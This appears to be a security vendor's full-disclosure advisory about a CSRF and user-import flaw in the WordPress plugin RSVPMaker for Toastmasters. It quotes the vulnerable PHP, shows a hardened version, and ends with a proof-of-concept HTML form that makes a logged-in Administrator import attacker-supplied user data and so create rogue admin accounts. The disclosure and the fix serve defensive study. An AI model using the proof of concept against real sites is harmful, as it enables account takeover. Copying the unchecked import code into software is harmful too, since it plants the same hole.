Full Disclosure of Cross-Site Request Forgery (CSRF)/User Import Vulnerability in RSVPMaker for Toastmasters
One of the ways we help to improve the security of WordPress plugins, not just for our customers but for everyone using them, is by proactively monitoring changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. While we have a number of automated checks that are used to try to spot the possibility of those, most of the vulnerabilities found so far have come from only two of them. Once again, though, another one of those checks has caught a vulnerability. This time it is a cross-site request forgery (CSRF)/user import vulnerability in RSVPMaker for Toastmasters, which could allow an attacker to cause a logged in Administrator to create another Administrator account that is controlled by the attacker.
When the plugin’s Import/Export page, /wp-admin/admin.php?page=import_export, is accessed, code runs that can create new WordPress users based on the contents of a URL. There is no protection against CSRF when doing that (no nonce is checked before the import runs), so if a hacker could get a logged in Administrator to access a page they control, they could cause that to happen.
The code for that starts with this:
if(isset($_POST['importurl'])) {
    $message = file_get_contents($_POST['importurl']);
That fetches the data used to create the accounts from the URL given in the POST input “importurl”. The URL is passed straight to file_get_contents(), so the fetch is made by the WordPress server itself, with no nonce check and no validation of the URL beforehand.
Later in the code it creates user_meta database entries derived from that data:
foreach($user->usermeta as $meta_key => $meta_value) {
    //echo '<div>'.$meta_key.' value:</div>';
    if(is_serialized($meta_value))
        $value = unserialize($meta_value);
    else
        $value = $meta_value;
    //print_r($value);
    //echo '<br />';
    update_user_meta($member_id,$meta_key,$value);
    $record_count++;
}
The role of a WordPress user is stored in the “{table prefix}capabilities” user meta entry (“wp_capabilities” with the default prefix), and since the loop writes whatever meta keys the imported data contains, the new users can easily be given the Administrator role.
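For comparison, here is how the same import step looks when it is protected. This is an added example written for this post, not code from RSVPMaker for Toastmasters or from WordPress itself. It assumes a nonce action name “rsvpmaker_import_users”, the page slug “import_export” already used above, and a JSON import format with a top-level “users” array of objects carrying “login”, “email”, “role” and “usermeta” (the plugin’s real import format is not shown on this page, so that format is an assumption). The points it demonstrates are the ones the vulnerable code lacks: a capability check, a nonce check that a cross-site form cannot satisfy, fetching through the WordPress HTTP API with a validated URL, assigning the role through wp_insert_user() against an allowlist instead of writing the capabilities meta key from imported data, and unserializing imported values with object instantiation disabled.

```php
<?php
/**
 * Hardened user import for an admin page (example code, not the plugin's own).
 * Assumptions not taken from the original post: nonce action
 * 'rsvpmaker_import_users' and a JSON format {"users":[{login,email,role,usermeta}]}.
 */

// Form side: emit a nonce that ties the request to this logged-in user.
function example_import_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=import_export' ) ); ?>">
        <?php wp_nonce_field( 'rsvpmaker_import_users' ); ?>
        <input type="url" name="importurl" value="" />
        <?php submit_button( 'Import users' ); ?>
    </form>
    <?php
}

// Handler side: verify capability and nonce before fetching anything.
// Returns the number of users created.
function example_handle_import() {
    if ( ! isset( $_POST['importurl'] ) ) {
        return 0;
    }
    // Only users allowed to create accounts may import, and only with a valid
    // nonce; a form on an attacker's site cannot supply one.
    if ( ! current_user_can( 'create_users' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'rsvpmaker_import_users' ); // dies if the nonce is missing or invalid

    $url = esc_url_raw( wp_unslash( $_POST['importurl'] ) );
    if ( ! wp_http_validate_url( $url ) ) {
        wp_die( 'Invalid import URL.' );
    }

    // Fetch through the WP HTTP API rather than file_get_contents().
    $response = wp_remote_get( $url, array( 'timeout' => 15 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_die( 'Could not fetch import data.' );
    }
    $data = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( empty( $data['users'] ) || ! is_array( $data['users'] ) ) {
        wp_die( 'Malformed import data.' );
    }

    // Roles the importing user is permitted to assign.
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $allowed_roles = array_keys( get_editable_roles() );
    // Meta keys that decide privileges must never come from imported data.
    global $wpdb;
    $protected_keys = array( $wpdb->prefix . 'capabilities', $wpdb->prefix . 'user_level' );

    $count = 0;
    foreach ( $data['users'] as $entry ) {
        $login = isset( $entry['login'] ) ? sanitize_user( $entry['login'], true ) : '';
        $email = isset( $entry['email'] ) ? sanitize_email( $entry['email'] ) : '';
        if ( '' === $login || ! is_email( $email ) || get_user_by( 'login', $login ) ) {
            continue; // skip malformed entries and existing accounts
        }
        $role = isset( $entry['role'] ) ? sanitize_key( $entry['role'] ) : 'subscriber';
        if ( ! in_array( $role, $allowed_roles, true ) ) {
            $role = 'subscriber'; // unknown or disallowed role falls back to the least privilege
        }
        $member_id = wp_insert_user( array(
            'user_login' => $login,
            'user_email' => $email,
            'user_pass'  => wp_generate_password( 24, true ),
            'role'       => $role,
        ) );
        if ( is_wp_error( $member_id ) ) {
            continue;
        }
        if ( ! empty( $entry['usermeta'] ) && is_array( $entry['usermeta'] ) ) {
            foreach ( $entry['usermeta'] as $meta_key => $meta_value ) {
                $meta_key = sanitize_key( $meta_key );
                if ( in_array( $meta_key, $protected_keys, true ) ) {
                    continue; // role was set via wp_insert_user() above, never from raw meta
                }
                // Serialized strings are unserialized with object instantiation
                // disabled; update_user_meta() re-serializes arrays on its own.
                if ( is_serialized( $meta_value ) ) {
                    $meta_value = unserialize( $meta_value, array( 'allowed_classes' => false ) );
                }
                update_user_meta( $member_id, $meta_key, $meta_value );
            }
        }
        $count++;
    }
    return $count;
}
```

The nonce check alone is what closes the CSRF hole described in this post; the role allowlist and the protected meta keys are there so that even a legitimate import cannot be turned into a privilege escalation by whoever controls the data at the import URL.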
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior, we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. Hopefully they will finally see the light and clean up their act soon, so that these full disclosures will no longer be needed (we hope they end soon).
Proof of Concept
The following proof of concept will create new WordPress users based on data at the specified URL (a sample of the format for that can be found on the plugin’s Import/Export page), when submitted by a browser that is logged in as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[data URL]” with the URL where the data is stored.
<html>
<body>
<!-- The form posts only "importurl"; no nonce is required by the vulnerable page. -->
<form action="http://[path to WordPress]/wp-admin/admin.php?page=import_export" method="POST" >
<input type="hidden" name="importurl" value="[data URL]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>